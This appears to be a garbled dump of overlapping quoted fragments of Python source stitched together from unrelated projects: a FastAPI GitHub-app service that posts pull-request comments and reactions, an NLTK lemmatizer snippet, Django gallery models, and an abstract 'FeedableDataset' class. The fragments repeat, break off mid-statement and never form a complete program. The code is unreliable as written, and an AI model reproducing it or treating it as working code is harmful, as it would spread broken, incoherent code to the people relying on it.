GitHub from github3.pulls import PullRequest from", "ActionIn): gh = login_as_installation(action) get_pr(gh, action).create_comment(action.content) return \"Post Success\", 200 @app.post('/reaction') def react_to_pr(action:", "import GitHub from github3.pulls import PullRequest from pydantic import BaseModel GITHUB_PRIVATE_KEY = os.environ.get('APP_PRIVATE_KEY',", "\"Post Success\", 200 def login_as_installation(action: ActionIn): try: gh = GitHub() gh.login_as_app(GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER) install", "get_pr(gh, action: ActionIn) -> PullRequest: try: return gh.pull_request( owner=action.owner, repository=action.repository, number=action.pr_number ) except", "return f'{self.owner}/{self.repository}' @app.post('/comment') def comment_on_pr(action: ActionIn): gh = login_as_installation(action) get_pr(gh, action).create_comment(action.content) return \"Post", "PullRequest from pydantic import BaseModel GITHUB_PRIVATE_KEY = os.environ.get('APP_PRIVATE_KEY', None) GITHUB_APP_IDENTIFIER = os.environ.get('APP_IDENTIFIER', None)", "gh.app_installation_for_repository(action.owner, action.repository) gh.login_as_app_installation( GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER, install.id ) return gh except NotFoundError: raise HTTPException(404,", "owner=action.owner, repository=action.repository, number=action.pr_number ) except ForbiddenError: raise HTTPException(403, f\"Application not setup for the", "pr_number: int @property def repo(self) -> str: return f'{self.owner}/{self.repository}' @app.post('/comment') def comment_on_pr(action: ActionIn):", "repository=action.repository, number=action.pr_number ) except ForbiddenError: raise HTTPException(403, f\"Application not setup for the repository", "issue = get_pr(gh, action).issue() issue._post( issue._api + '/reactions', data={\"content\": action.content}, headers={'Accept': 'application/vnd.github.squirrel-girl-preview+json'} )", "gh.pull_request( owner=action.owner, repository=action.repository, number=action.pr_number ) except ForbiddenError: raise HTTPException(403, f\"Application not setup for", "@app.post('/reaction') def react_to_pr(action: ActionIn): gh = login_as_installation(action) issue = get_pr(gh, action).issue() issue._post( issue._api", "str pr_number: int @property def repo(self) -> str: return f'{self.owner}/{self.repository}' @app.post('/comment') def comment_on_pr(action:", "Perf App not installed to {action.repo}\") def get_pr(gh, action: ActionIn) -> PullRequest: try:", "= open('private-key.pem', 'rt').read() app = FastAPI() class ActionIn(BaseModel): content: str owner: str repository:", "'/reactions', data={\"content\": action.content}, headers={'Accept': 'application/vnd.github.squirrel-girl-preview+json'} ) return \"Post Success\", 200 def login_as_installation(action: ActionIn):", "install.id ) return gh except NotFoundError: raise HTTPException(404, f\"OpeAPI Perf App not installed", "try: return gh.pull_request( owner=action.owner, repository=action.repository, number=action.pr_number ) except ForbiddenError: raise HTTPException(403, f\"Application not", "action.repository) gh.login_as_app_installation( GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER, install.id ) return gh except NotFoundError: raise HTTPException(404, f\"OpeAPI", "from fastapi import FastAPI, HTTPException from github3.exceptions import NotFoundError, ForbiddenError from github3.github import", "comment_on_pr(action: ActionIn): gh = login_as_installation(action) get_pr(gh, action).create_comment(action.content) return \"Post Success\", 200 @app.post('/reaction') def", "get_pr(gh, action).issue() issue._post( issue._api + '/reactions', data={\"content\": action.content}, headers={'Accept': 'application/vnd.github.squirrel-girl-preview+json'} ) return \"Post", "import PullRequest from pydantic import BaseModel GITHUB_PRIVATE_KEY = os.environ.get('APP_PRIVATE_KEY', None) GITHUB_APP_IDENTIFIER = os.environ.get('APP_IDENTIFIER',", "fastapi import FastAPI, HTTPException from github3.exceptions import NotFoundError, ForbiddenError from github3.github import GitHub", "ActionIn): gh = login_as_installation(action) issue = get_pr(gh, action).issue() issue._post( issue._api + '/reactions', data={\"content\":", "not installed to {action.repo}\") def get_pr(gh, action: ActionIn) -> PullRequest: try: return gh.pull_request(", "repo(self) -> str: return f'{self.owner}/{self.repository}' @app.post('/comment') def comment_on_pr(action: ActionIn): gh = login_as_installation(action) get_pr(gh,", "from github3.exceptions import NotFoundError, ForbiddenError from github3.github import GitHub from github3.pulls import PullRequest", "'rt').read() app = FastAPI() class ActionIn(BaseModel): content: str owner: str repository: str pr_number:", "= get_pr(gh, action).issue() issue._post( issue._api + '/reactions', data={\"content\": action.content}, headers={'Accept': 'application/vnd.github.squirrel-girl-preview+json'} ) return", "app = FastAPI() class ActionIn(BaseModel): content: str owner: str repository: str pr_number: int", "ActionIn(BaseModel): content: str owner: str repository: str pr_number: int @property def repo(self) ->", "f\"OpeAPI Perf App not installed to {action.repo}\") def get_pr(gh, action: ActionIn) -> PullRequest:", "class ActionIn(BaseModel): content: str owner: str repository: str pr_number: int @property def repo(self)", "'application/vnd.github.squirrel-girl-preview+json'} ) return \"Post Success\", 200 def login_as_installation(action: ActionIn): try: gh = GitHub()", "GitHub from github3.pulls import PullRequest from pydantic import BaseModel GITHUB_PRIVATE_KEY = os.environ.get('APP_PRIVATE_KEY', None)", "def repo(self) -> str: return f'{self.owner}/{self.repository}' @app.post('/comment') def comment_on_pr(action: ActionIn): gh = login_as_installation(action)", "to {action.repo}\") def get_pr(gh, action: ActionIn) -> PullRequest: try: return gh.pull_request( owner=action.owner, repository=action.repository,", "int @property def repo(self) -> str: return f'{self.owner}/{self.repository}' @app.post('/comment') def comment_on_pr(action: ActionIn): gh", "GITHUB_PRIVATE_KEY: GITHUB_PRIVATE_KEY = open('private-key.pem', 'rt').read() app = FastAPI() class ActionIn(BaseModel): content: str owner:", "HTTPException from github3.exceptions import NotFoundError, ForbiddenError from github3.github import GitHub from github3.pulls import", "data={\"content\": action.content}, headers={'Accept': 'application/vnd.github.squirrel-girl-preview+json'} ) return \"Post Success\", 200 def login_as_installation(action: ActionIn): try:", "except NotFoundError: raise HTTPException(404, f\"OpeAPI Perf App not installed to {action.repo}\") def get_pr(gh,", "-> PullRequest: try: return gh.pull_request( owner=action.owner, repository=action.repository, number=action.pr_number ) except ForbiddenError: raise HTTPException(403,", "str: return f'{self.owner}/{self.repository}' @app.post('/comment') def comment_on_pr(action: ActionIn): gh = login_as_installation(action) get_pr(gh, action).create_comment(action.content) return", "Success\", 200 def login_as_installation(action: ActionIn): try: gh = GitHub() gh.login_as_app(GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER) install =", "= os.environ.get('APP_PRIVATE_KEY', None) GITHUB_APP_IDENTIFIER = os.environ.get('APP_IDENTIFIER', None) if not GITHUB_PRIVATE_KEY: GITHUB_PRIVATE_KEY = open('private-key.pem',", "ActionIn) -> PullRequest: try: return gh.pull_request( owner=action.owner, repository=action.repository, number=action.pr_number ) except ForbiddenError: raise", "import NotFoundError, ForbiddenError from github3.github import GitHub from github3.pulls import PullRequest from pydantic", "action.content}, headers={'Accept': 'application/vnd.github.squirrel-girl-preview+json'} ) return \"Post Success\", 200 def login_as_installation(action: ActionIn): try: gh", "return \"Post Success\", 200 def login_as_installation(action: ActionIn): try: gh = GitHub() gh.login_as_app(GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER)", "open('private-key.pem', 'rt').read() app = FastAPI() class ActionIn(BaseModel): content: str owner: str repository: str", "headers={'Accept': 'application/vnd.github.squirrel-girl-preview+json'} ) return \"Post Success\", 200 def login_as_installation(action: ActionIn): try: gh =", "gh = login_as_installation(action) get_pr(gh, action).create_comment(action.content) return \"Post Success\", 200 @app.post('/reaction') def react_to_pr(action: ActionIn):", "= login_as_installation(action) get_pr(gh, action).create_comment(action.content) return \"Post Success\", 200 @app.post('/reaction') def react_to_pr(action: ActionIn): gh", "return gh except NotFoundError: raise HTTPException(404, f\"OpeAPI Perf App not installed to {action.repo}\")", "App not installed to {action.repo}\") def get_pr(gh, action: ActionIn) -> PullRequest: try: return", "f'{self.owner}/{self.repository}' @app.post('/comment') def comment_on_pr(action: ActionIn): gh = login_as_installation(action) get_pr(gh, action).create_comment(action.content) return \"Post Success\",", "login_as_installation(action) get_pr(gh, action).create_comment(action.content) return \"Post Success\", 200 @app.post('/reaction') def react_to_pr(action: ActionIn): gh =", "login_as_installation(action: ActionIn): try: gh = GitHub() gh.login_as_app(GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER) install = gh.app_installation_for_repository(action.owner, action.repository) gh.login_as_app_installation(", "setup for the repository {action.repo}\") except NotFoundError: raise HTTPException(404, f\"PR #{action.pr_number} does not", "NotFoundError: raise HTTPException(404, f\"OpeAPI Perf App not installed to {action.repo}\") def get_pr(gh, action:", "FastAPI() class ActionIn(BaseModel): content: str owner: str repository: str pr_number: int @property def", "HTTPException(403, f\"Application not setup for the repository {action.repo}\") except NotFoundError: raise HTTPException(404, f\"PR", "GITHUB_APP_IDENTIFIER) install = gh.app_installation_for_repository(action.owner, action.repository) gh.login_as_app_installation( GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER, install.id ) return gh except", "= GitHub() gh.login_as_app(GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER) install = gh.app_installation_for_repository(action.owner, action.repository) gh.login_as_app_installation( GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER, install.id )", "os from fastapi import FastAPI, HTTPException from github3.exceptions import NotFoundError, ForbiddenError from github3.github", "issue._post( issue._api + '/reactions', data={\"content\": action.content}, headers={'Accept': 'application/vnd.github.squirrel-girl-preview+json'} ) return \"Post Success\", 200", "owner: str repository: str pr_number: int @property def repo(self) -> str: return f'{self.owner}/{self.repository}'", "FastAPI, HTTPException from github3.exceptions import NotFoundError, ForbiddenError from github3.github import GitHub from github3.pulls", "except ForbiddenError: raise HTTPException(403, f\"Application not setup for the repository {action.repo}\") except NotFoundError:", "def comment_on_pr(action: ActionIn): gh = login_as_installation(action) get_pr(gh, action).create_comment(action.content) return \"Post Success\", 200 @app.post('/reaction')", "repository: str pr_number: int @property def repo(self) -> str: return f'{self.owner}/{self.repository}' @app.post('/comment') def", "GitHub() gh.login_as_app(GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER) install = gh.app_installation_for_repository(action.owner, action.repository) gh.login_as_app_installation( GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER, install.id ) return", "if not GITHUB_PRIVATE_KEY: GITHUB_PRIVATE_KEY = open('private-key.pem', 'rt').read() app = FastAPI() class ActionIn(BaseModel): content:", "return \"Post Success\", 200 @app.post('/reaction') def react_to_pr(action: ActionIn): gh = login_as_installation(action) issue =", "def get_pr(gh, action: ActionIn) -> PullRequest: try: return gh.pull_request( owner=action.owner, repository=action.repository, number=action.pr_number )", "number=action.pr_number ) except ForbiddenError: raise HTTPException(403, f\"Application not setup for the repository {action.repo}\")", ") return \"Post Success\", 200 def login_as_installation(action: ActionIn): try: gh = GitHub() gh.login_as_app(GITHUB_PRIVATE_KEY.encode(),", "None) GITHUB_APP_IDENTIFIER = os.environ.get('APP_IDENTIFIER', None) if not GITHUB_PRIVATE_KEY: GITHUB_PRIVATE_KEY = open('private-key.pem', 'rt').read() app", "from pydantic import BaseModel GITHUB_PRIVATE_KEY = os.environ.get('APP_PRIVATE_KEY', None) GITHUB_APP_IDENTIFIER = os.environ.get('APP_IDENTIFIER', None) if", "BaseModel GITHUB_PRIVATE_KEY = os.environ.get('APP_PRIVATE_KEY', None) GITHUB_APP_IDENTIFIER = os.environ.get('APP_IDENTIFIER', None) if not GITHUB_PRIVATE_KEY: GITHUB_PRIVATE_KEY", "@property def repo(self) -> str: return f'{self.owner}/{self.repository}' @app.post('/comment') def comment_on_pr(action: ActionIn): gh =", "pydantic import BaseModel GITHUB_PRIVATE_KEY = os.environ.get('APP_PRIVATE_KEY', None) GITHUB_APP_IDENTIFIER = os.environ.get('APP_IDENTIFIER', None) if not", "ForbiddenError from github3.github import GitHub from github3.pulls import PullRequest from pydantic import BaseModel", "GITHUB_APP_IDENTIFIER = os.environ.get('APP_IDENTIFIER', None) if not GITHUB_PRIVATE_KEY: GITHUB_PRIVATE_KEY = open('private-key.pem', 'rt').read() app =", "\"Post Success\", 200 @app.post('/reaction') def react_to_pr(action: ActionIn): gh = login_as_installation(action) issue = get_pr(gh,", "import BaseModel GITHUB_PRIVATE_KEY = os.environ.get('APP_PRIVATE_KEY', None) GITHUB_APP_IDENTIFIER = os.environ.get('APP_IDENTIFIER', None) if not GITHUB_PRIVATE_KEY:", "issue._api + '/reactions', data={\"content\": action.content}, headers={'Accept': 'application/vnd.github.squirrel-girl-preview+json'} ) return \"Post Success\", 200 def", "GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER, install.id ) return gh except NotFoundError: raise HTTPException(404, f\"OpeAPI Perf App", "return gh.pull_request( owner=action.owner, repository=action.repository, number=action.pr_number ) except ForbiddenError: raise HTTPException(403, f\"Application not setup", "raise HTTPException(403, f\"Application not setup for the repository {action.repo}\") except NotFoundError: raise HTTPException(404,", "200 @app.post('/reaction') def react_to_pr(action: ActionIn): gh = login_as_installation(action) issue = get_pr(gh, action).issue() issue._post(" ]
[ "WordNetLemmatizer() ''' print(lemmatizer.lemmatize(\"cacti\")) print(lemmatizer.lemmatize(\"geese\")) print(lemmatizer.lemmatize(\"rocks\")) print(lemmatizer.lemmatize(\"python\")) ''' #default pos=\"n\"(noun) #\"a\" = adjective, \"v\"", "#lemmas give back actual words, usually better then stemmers print(lemmatizer.lemmatize(\"better\", pos=\"a\")) print(lemmatizer.lemmatize(\"best\", pos=\"a\"))", "print(lemmatizer.lemmatize(\"cacti\")) print(lemmatizer.lemmatize(\"geese\")) print(lemmatizer.lemmatize(\"rocks\")) print(lemmatizer.lemmatize(\"python\")) ''' #default pos=\"n\"(noun) #\"a\" = adjective, \"v\" = verb", "from nltk.stem import WordNetLemmatizer lemmatizer = WordNetLemmatizer() ''' print(lemmatizer.lemmatize(\"cacti\")) print(lemmatizer.lemmatize(\"geese\")) print(lemmatizer.lemmatize(\"rocks\")) print(lemmatizer.lemmatize(\"python\")) '''", "print(lemmatizer.lemmatize(\"geese\")) print(lemmatizer.lemmatize(\"rocks\")) print(lemmatizer.lemmatize(\"python\")) ''' #default pos=\"n\"(noun) #\"a\" = adjective, \"v\" = verb #lemmas", "= WordNetLemmatizer() ''' print(lemmatizer.lemmatize(\"cacti\")) print(lemmatizer.lemmatize(\"geese\")) print(lemmatizer.lemmatize(\"rocks\")) print(lemmatizer.lemmatize(\"python\")) ''' #default pos=\"n\"(noun) #\"a\" = adjective,", "actual words, usually better then stemmers print(lemmatizer.lemmatize(\"better\", pos=\"a\")) print(lemmatizer.lemmatize(\"best\", pos=\"a\")) print(lemmatizer.lemmatize(\"run\", pos=\"v\")) print(lemmatizer.lemmatize(\"run\"))", "give back actual words, usually better then stemmers print(lemmatizer.lemmatize(\"better\", pos=\"a\")) print(lemmatizer.lemmatize(\"best\", pos=\"a\")) print(lemmatizer.lemmatize(\"run\",", "''' #default pos=\"n\"(noun) #\"a\" = adjective, \"v\" = verb #lemmas give back actual", "nltk.stem import WordNetLemmatizer lemmatizer = WordNetLemmatizer() ''' print(lemmatizer.lemmatize(\"cacti\")) print(lemmatizer.lemmatize(\"geese\")) print(lemmatizer.lemmatize(\"rocks\")) print(lemmatizer.lemmatize(\"python\")) ''' #default", "= verb #lemmas give back actual words, usually better then stemmers print(lemmatizer.lemmatize(\"better\", pos=\"a\"))", "back actual words, usually better then stemmers print(lemmatizer.lemmatize(\"better\", pos=\"a\")) print(lemmatizer.lemmatize(\"best\", pos=\"a\")) print(lemmatizer.lemmatize(\"run\", pos=\"v\"))", "lemmatizer = WordNetLemmatizer() ''' print(lemmatizer.lemmatize(\"cacti\")) print(lemmatizer.lemmatize(\"geese\")) print(lemmatizer.lemmatize(\"rocks\")) print(lemmatizer.lemmatize(\"python\")) ''' #default pos=\"n\"(noun) #\"a\" =", "print(lemmatizer.lemmatize(\"python\")) ''' #default pos=\"n\"(noun) #\"a\" = adjective, \"v\" = verb #lemmas give back", "adjective, \"v\" = verb #lemmas give back actual words, usually better then stemmers", "\"v\" = verb #lemmas give back actual words, usually better then stemmers print(lemmatizer.lemmatize(\"better\",", "#\"a\" = adjective, \"v\" = verb #lemmas give back actual words, usually better", "import WordNetLemmatizer lemmatizer = WordNetLemmatizer() ''' print(lemmatizer.lemmatize(\"cacti\")) print(lemmatizer.lemmatize(\"geese\")) print(lemmatizer.lemmatize(\"rocks\")) print(lemmatizer.lemmatize(\"python\")) ''' #default pos=\"n\"(noun)", "= adjective, \"v\" = verb #lemmas give back actual words, usually better then", "pos=\"n\"(noun) #\"a\" = adjective, \"v\" = verb #lemmas give back actual words, usually", "print(lemmatizer.lemmatize(\"rocks\")) print(lemmatizer.lemmatize(\"python\")) ''' #default pos=\"n\"(noun) #\"a\" = adjective, \"v\" = verb #lemmas give", "''' print(lemmatizer.lemmatize(\"cacti\")) print(lemmatizer.lemmatize(\"geese\")) print(lemmatizer.lemmatize(\"rocks\")) print(lemmatizer.lemmatize(\"python\")) ''' #default pos=\"n\"(noun) #\"a\" = adjective, \"v\" =", "WordNetLemmatizer lemmatizer = WordNetLemmatizer() ''' print(lemmatizer.lemmatize(\"cacti\")) print(lemmatizer.lemmatize(\"geese\")) print(lemmatizer.lemmatize(\"rocks\")) print(lemmatizer.lemmatize(\"python\")) ''' #default pos=\"n\"(noun) #\"a\"", "verb #lemmas give back actual words, usually better then stemmers print(lemmatizer.lemmatize(\"better\", pos=\"a\")) print(lemmatizer.lemmatize(\"best\",", "#default pos=\"n\"(noun) #\"a\" = adjective, \"v\" = verb #lemmas give back actual words," ]
[ "location = models.ForeignKey(Location,on_delete=models.CASCADE) # one image belongs to a single location category =", "image belongs to a single category name= models.CharField(max_length=200) description = models.TextField(max_length=300) image =", "slug = models.SlugField(unique=True) def __str__(self): return self.name def get_absolute_url(self): return reverse('gallery_list',args=[self.slug]) class Image(models.Model):", "# one image belongs to a single location category = models.ForeignKey(Category,on_delete=models.CASCADE) # one", "return self.name class Category(models.Model): name = models.CharField(max_length=200) slug = models.SlugField(unique=True) def __str__(self): return", "= models.SlugField(unique=True) def __str__(self): return self.name def get_absolute_url(self): return reverse('gallery_list',args=[self.slug]) class Image(models.Model): location", "reverse from django.db import models # Create your models here class Location(models.Model): name", "def __str__(self): return self.name def get_absolute_url(self): return reverse('gallery_list',args=[self.slug]) class Image(models.Model): location = models.ForeignKey(Location,on_delete=models.CASCADE)", "Image(models.Model): location = models.ForeignKey(Location,on_delete=models.CASCADE) # one image belongs to a single location category", "belongs to a single location category = models.ForeignKey(Category,on_delete=models.CASCADE) # one image belongs to", "to a single category name= models.CharField(max_length=200) description = models.TextField(max_length=300) image = models.ImageField(upload_to =", "models # Create your models here class Location(models.Model): name = models.CharField(max_length=60) def __str__(self):", "= models.ForeignKey(Category,on_delete=models.CASCADE) # one image belongs to a single category name= models.CharField(max_length=200) description", "Category(models.Model): name = models.CharField(max_length=200) slug = models.SlugField(unique=True) def __str__(self): return self.name def get_absolute_url(self):", "= models.ForeignKey(Location,on_delete=models.CASCADE) # one image belongs to a single location category = models.ForeignKey(Category,on_delete=models.CASCADE)", "location category = models.ForeignKey(Category,on_delete=models.CASCADE) # one image belongs to a single category name=", "models here class Location(models.Model): name = models.CharField(max_length=60) def __str__(self): return self.name class Category(models.Model):", "import models # Create your models here class Location(models.Model): name = models.CharField(max_length=60) def", "from django.urls import reverse from django.db import models # Create your models here", "Create your models here class Location(models.Model): name = models.CharField(max_length=60) def __str__(self): return self.name", "def get_absolute_url(self): return reverse('gallery_list',args=[self.slug]) class Image(models.Model): location = models.ForeignKey(Location,on_delete=models.CASCADE) # one image belongs", "= models.CharField(max_length=200) slug = models.SlugField(unique=True) def __str__(self): return self.name def get_absolute_url(self): return reverse('gallery_list',args=[self.slug])", "name= models.CharField(max_length=200) description = models.TextField(max_length=300) image = models.ImageField(upload_to = 'articles/',blank=True) def get_absolute_url(self): return", "# Create your models here class Location(models.Model): name = models.CharField(max_length=60) def __str__(self): return", "a single location category = models.ForeignKey(Category,on_delete=models.CASCADE) # one image belongs to a single", "return self.name def get_absolute_url(self): return reverse('gallery_list',args=[self.slug]) class Image(models.Model): location = models.ForeignKey(Location,on_delete=models.CASCADE) # one", "your models here class Location(models.Model): name = models.CharField(max_length=60) def __str__(self): return self.name class", "get_absolute_url(self): return reverse('gallery_list',args=[self.slug]) class Image(models.Model): location = models.ForeignKey(Location,on_delete=models.CASCADE) # one image belongs to", "single location category = models.ForeignKey(Category,on_delete=models.CASCADE) # one image belongs to a single category", "name = models.CharField(max_length=60) def __str__(self): return self.name class Category(models.Model): name = models.CharField(max_length=200) slug", "return reverse('gallery_list',args=[self.slug]) class Image(models.Model): location = models.ForeignKey(Location,on_delete=models.CASCADE) # one image belongs to a", "import reverse from django.db import models # Create your models here class Location(models.Model):", "# one image belongs to a single category name= models.CharField(max_length=200) description = models.TextField(max_length=300)", "= models.CharField(max_length=60) def __str__(self): return self.name class Category(models.Model): name = models.CharField(max_length=200) slug =", "models.CharField(max_length=200) slug = models.SlugField(unique=True) def __str__(self): return self.name def get_absolute_url(self): return reverse('gallery_list',args=[self.slug]) class", "class Location(models.Model): name = models.CharField(max_length=60) def __str__(self): return self.name class Category(models.Model): name =", "self.name def get_absolute_url(self): return reverse('gallery_list',args=[self.slug]) class Image(models.Model): location = models.ForeignKey(Location,on_delete=models.CASCADE) # one image", "one image belongs to a single category name= models.CharField(max_length=200) description = models.TextField(max_length=300) image", "self.name class Category(models.Model): name = models.CharField(max_length=200) slug = models.SlugField(unique=True) def __str__(self): return self.name", "reverse('gallery_list',args=[self.slug]) class Image(models.Model): location = models.ForeignKey(Location,on_delete=models.CASCADE) # one image belongs to a single", "here class Location(models.Model): name = models.CharField(max_length=60) def __str__(self): return self.name class Category(models.Model): name", "image belongs to a single location category = models.ForeignKey(Category,on_delete=models.CASCADE) # one image belongs", "Location(models.Model): name = models.CharField(max_length=60) def __str__(self): return self.name class Category(models.Model): name = models.CharField(max_length=200)", "category name= models.CharField(max_length=200) description = models.TextField(max_length=300) image = models.ImageField(upload_to = 'articles/',blank=True) def get_absolute_url(self):", "to a single location category = models.ForeignKey(Category,on_delete=models.CASCADE) # one image belongs to a", "models.ForeignKey(Location,on_delete=models.CASCADE) # one image belongs to a single location category = models.ForeignKey(Category,on_delete=models.CASCADE) #", "models.CharField(max_length=60) def __str__(self): return self.name class Category(models.Model): name = models.CharField(max_length=200) slug = models.SlugField(unique=True)", "django.urls import reverse from django.db import models # Create your models here class", "single category name= models.CharField(max_length=200) description = models.TextField(max_length=300) image = models.ImageField(upload_to = 'articles/',blank=True) def", "django.db import models # Create your models here class Location(models.Model): name = models.CharField(max_length=60)", "__str__(self): return self.name class Category(models.Model): name = models.CharField(max_length=200) slug = models.SlugField(unique=True) def __str__(self):", "category = models.ForeignKey(Category,on_delete=models.CASCADE) # one image belongs to a single category name= models.CharField(max_length=200)", "models.CharField(max_length=200) description = models.TextField(max_length=300) image = models.ImageField(upload_to = 'articles/',blank=True) def get_absolute_url(self): return reverse('gallery_detail',args=[self.id])", "belongs to a single category name= models.CharField(max_length=200) description = models.TextField(max_length=300) image = models.ImageField(upload_to", "one image belongs to a single location category = models.ForeignKey(Category,on_delete=models.CASCADE) # one image", "class Category(models.Model): name = models.CharField(max_length=200) slug = models.SlugField(unique=True) def __str__(self): return self.name def", "def __str__(self): return self.name class Category(models.Model): name = models.CharField(max_length=200) slug = models.SlugField(unique=True) def", "from django.db import models # Create your models here class Location(models.Model): name =", "models.SlugField(unique=True) def __str__(self): return self.name def get_absolute_url(self): return reverse('gallery_list',args=[self.slug]) class Image(models.Model): location =", "__str__(self): return self.name def get_absolute_url(self): return reverse('gallery_list',args=[self.slug]) class Image(models.Model): location = models.ForeignKey(Location,on_delete=models.CASCADE) #", "a single category name= models.CharField(max_length=200) description = models.TextField(max_length=300) image = models.ImageField(upload_to = 'articles/',blank=True)", "models.ForeignKey(Category,on_delete=models.CASCADE) # one image belongs to a single category name= models.CharField(max_length=200) description =", "class Image(models.Model): location = models.ForeignKey(Location,on_delete=models.CASCADE) # one image belongs to a single location", "name = models.CharField(max_length=200) slug = models.SlugField(unique=True) def __str__(self): return self.name def get_absolute_url(self): return" ]
[ "as inout :param queue_name: The name of the queue where to put the", "FixedProtoField from diplomacy_research.utils.model import pad_list # Constants LOGGER = logging.getLogger(__name__) class FeedableDataset(metaclass=ABCMeta): \"\"\"", "it is a remote (RPC) dataset \"\"\" raise NotImplementedError() @property def is_started(self): \"\"\"", "fields.' % feature proto_field = self.proto_fields[feature] # Converting sets to lists if isinstance(item[feature],", "session: tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() def get_feedable_item(self, *args, **kwargs): \"\"\" Calls the dataset_builder", "diplomacy_research.models.datasets.base_builder import BaseBuilder, VarProtoField, FixedProtoField from diplomacy_research.utils.model import pad_list # Constants LOGGER =", "sure the item respects the required protofields and casts/pads the item accordingly \"\"\"", "Len - Converting and flattening # Scalar - Just converting # Fixed Len", "2019 - <NAME> # # NOTICE: Permission is hereby granted, free of charge,", "files (the \"Software\"), # to deal in the Software without restriction, including without", "np.array(pad_list(item[feature], proto_field.shape), proto_field.dtype) # Returning item return item @abstractmethod def get_results(self, queue_name, item,", "# Constants LOGGER = logging.getLogger(__name__) class FeedableDataset(metaclass=ABCMeta): \"\"\" This object is a generic", "session to use. :type session: tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() @abstractmethod def initialize(self, session):", "Software without restriction, including without limitation the # rights to use, copy, modify,", "substantial portions of the Software. # ============================================================================== \"\"\" Feedable Dataset - Abstract class", "self.proto_fields, 'Feature %s is not in proto fields.' % feature proto_field = self.proto_fields[feature]", "proto_field.dtype) # Returning item return item @abstractmethod def get_results(self, queue_name, item, retry_on_failure=True, **kwargs):", "item[feature] = np.array(item[feature], proto_field.dtype) elif isinstance(proto_field, FixedProtoField): item[feature] = np.array(pad_list(item[feature], proto_field.shape), proto_field.dtype) #", "the # rights to use, copy, modify, merge, publish, distribute, sublicense, and/or #", ":param cluster_config: Optional. If set, the cluster configuration will be used for distributed", "right dtype for feature in item: assert feature in self.proto_fields, 'Feature %s is", "isinstance(item[feature], set): item[feature] = list(item[feature]) # Var Len - Converting and flattening #", "__init__(self, dataset_builder, cluster_config=None): \"\"\" Constructor :param dataset_builder: An instance of `BaseBuilder` containing the", "distributed training. :type dataset_builder: diplomacy_research.models.datasets.base_builder.BaseBuilder :type cluster_config: diplomacy_research.utils.cluster.ClusterConfig \"\"\" self.dataset_builder = dataset_builder self.cluster_config", "Fixed Len - Padding and converting if proto_field.dtype is None: continue elif isinstance(proto_field,", "encountered. :return: A tornado.concurrent.Future that will be set with the results when they", "# # NOTICE: Permission is hereby granted, free of charge, to any person", "and casts/pads the item accordingly \"\"\" # Checking all features in items, padding", "been started \"\"\" return self._is_started @property def is_initialized(self): \"\"\" Determines if the iterator", "# ============================================================================== \"\"\" Feedable Dataset - Abstract class responsible for feeding data inside", "class responsible for feeding data inside a model \"\"\" from abc import ABCMeta,", "- Just converting # Fixed Len - Padding and converting if proto_field.dtype is", "persons to whom the Software is # furnished to do so, subject to", "publish, distribute, sublicense, and/or # sell copies of the Software, and to permit", "\"\"\" return self._is_initialized @property def is_closing(self): \"\"\" Determines if the dataset is closing", "self._is_initialized @property def is_closing(self): \"\"\" Determines if the dataset is closing \"\"\" return", "conditions: # # The above copyright notice and this permission notice shall be", "session: tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() @abstractmethod def initialize(self, session): \"\"\" Initializes the dataset", "= dataset_builder self.cluster_config = cluster_config self.proto_fields = BaseBuilder.parse_sparse_fields(dataset_builder.proto_fields) self.default_features = {} # Will", "\"\"\" Computes the outputs of a name using item as inout :param queue_name:", "# Copyright 2019 - <NAME> # # NOTICE: Permission is hereby granted, free", "obtaining # a copy of this software and associated documentation files (the \"Software\"),", "to permit persons to whom the Software is # furnished to do so,", "Len - Padding and converting if proto_field.dtype is None: continue elif isinstance(proto_field, VarProtoField):", "@property def can_support_iterator(self): \"\"\" Determines if the dataset can support an iterator or", "the Software without restriction, including without limitation the # rights to use, copy,", "# to deal in the Software without restriction, including without limitation the #", "item :param item: A dictionary with the fields required for that queue :param", "for that queue :param retry_on_failure: Boolean that indicates to retry querying from the", "# ============================================================================== # Copyright 2019 - <NAME> # # NOTICE: Permission is hereby", "that will be set with the results when they become available \"\"\" raise", "any person obtaining # a copy of this software and associated documentation files", "set, the cluster configuration will be used for distributed training. :type dataset_builder: diplomacy_research.models.datasets.base_builder.BaseBuilder", "= np.array(pad_list(item[feature], proto_field.shape), proto_field.dtype) # Returning item return item @abstractmethod def get_results(self, queue_name,", ":param retry_on_failure: Boolean that indicates to retry querying from the model if an", "of `BaseBuilder` containing the proto-fields and generation methods :param cluster_config: Optional. If set,", "dataset :param session: The TensorFlow session to use. :type session: tensorflow.python.client.session.Session \"\"\" raise", "\"\"\" Determines if the dataset can support an iterator or if it is", "Permission is hereby granted, free of charge, to any person obtaining # a", "for distributed training. :type dataset_builder: diplomacy_research.models.datasets.base_builder.BaseBuilder :type cluster_config: diplomacy_research.utils.cluster.ClusterConfig \"\"\" self.dataset_builder = dataset_builder", "so, subject to the following conditions: # # The above copyright notice and", "get_feedable_item \"\"\" return self.dataset_builder.get_feedable_item(*args, **kwargs) def prepare_item(self, item): \"\"\" Makes sure the item", "model \"\"\" from abc import ABCMeta, abstractmethod import logging import numpy as np", "the iterator is initialized \"\"\" return self._is_initialized @property def is_closing(self): \"\"\" Determines if", "class FeedableDataset(metaclass=ABCMeta): \"\"\" This object is a generic feedable dataset \"\"\" def __init__(self,", "- Abstract class responsible for feeding data inside a model \"\"\" from abc", ":return: A tornado.concurrent.Future that will be set with the results when they become", "dataset_builder self.cluster_config = cluster_config self.proto_fields = BaseBuilder.parse_sparse_fields(dataset_builder.proto_fields) self.default_features = {} # Will be", "name using item as inout :param queue_name: The name of 